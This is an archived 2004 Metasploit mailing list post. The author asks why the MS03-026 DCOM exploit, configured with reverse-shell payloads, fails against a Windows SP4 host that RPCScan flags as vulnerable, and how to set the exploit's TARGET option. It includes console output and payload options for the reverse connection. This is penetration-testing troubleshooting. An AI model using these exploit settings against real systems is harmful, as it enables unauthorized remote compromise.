Metasploit mailing list archives

RPCScan v2.03 vs exploit msrpc_dcom_ms03_026

From: itorres at litronic.com (Israel Torres)
Date: Thu, 19 Aug 2004 07:25:27 -0700

Hi, 

2 questions:

I have run *Foundstone's RPCScan v2.03 on a SP4 system to find that it is
resulting in VULNERABLE.
When I use and configure msrpc_dcom_ms03_026 (with either win32_reverse, or
win32_reverse_vncinject)
The following error is returned:

msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Connected to REMACT with group ID 0x6317
[*] Exiting Reverse Handler.

I have run this exploit on this machine unpatched and it operated as
expected (successfully exploitable with either payload above). Is
foundstone's tool just not working correctly? (as it seems)

The last question I have been unable to find an answer for is setting the
TARGET does not work by simply stating:
set TARGET 2K
set TARGET Windows 2K
since both result in Target: Target Not Specified
only set TARGET ALL will configure for Target: Windows NT SP6/2K/XP ALL

Thanks for your help,
Israel Torres

Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST     itest      The target address
  required    RPORT     135        The target port

  Payload:    Name        Default    Description
  --------    --------    -------
------------------------------------------

  optional    EXITFUNC    seh        Exit technique: "process", "thread",
"seh"
  required    LHOST       itorres    Local address to receive connection
  required    LPORT       4321       Local port to receive connection

  Target: Windows NT SP6/2K/XP ALL

REF:-----------------------------

References:

*RPCScan v2.03   
  <http://www.foundstone.com/images/clear.gif>  
RPCScan v2.03 is a Windows based detection and analysis utility that can
quickly and accurately identify Microsoft operating systems that are
vulnerable to the multiple buffer overflow vulnerabilities released in the
MS03-026 and MS03-039 bulletins.         
http://www.foundstone.com/resources/termsofuse.htm?file=rpcscan2.zip
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20040819/e4c82bbf/attachment.htm>

Current thread:

RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 Israel Torres (Aug 19)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 H D Moore (Aug 19)
  - RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 odinanne (Aug 20)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 Carric Dooley (Aug 21)